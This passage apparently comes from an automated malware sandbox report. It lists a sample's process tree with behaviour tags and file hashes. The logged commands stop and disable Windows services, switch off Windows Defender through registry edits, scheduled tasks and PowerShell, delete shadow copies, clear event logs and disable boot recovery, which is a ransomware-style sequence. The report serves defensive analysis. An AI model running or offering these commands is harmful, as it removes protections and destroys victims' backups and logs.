C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1624
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:832
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:360
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:828
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1112
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1928
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1976
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1652
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:680
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1312
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1296
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1756
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1440
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1304
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1672
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:584
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1528
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1524
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:272
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1544
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:432
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1112
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1612
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1476
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1360
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1632
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:316
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:384
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:920
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1572
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:664
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1416
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1864
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:800
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1600
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1588
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:560
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:632
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:804
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1776
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:772
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:916
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1408
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1548
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1868
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:688
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:960 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:764
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:832 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1384 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1716 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:564 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1620 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1400 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2064 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:2088 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2108
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2128 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2140
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2160 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2224
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2244
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD55464474b4b4e8ae38c10b2cd2ada30fe
SHA11f91b4850c26fdcce42aa16c2f571459772f4329
SHA256f4a25c2e6153d00d41b9a2db8dcb3c496fa42620638e69c2e40631e40628f4f7
SHA512f897951fedafe5788af2335f87118d735977e011e93be3ee91cefcbb142d3aa02338e1181b7e723ddf48f4388f61d9297f8cb70a302df6946b400056c401e59d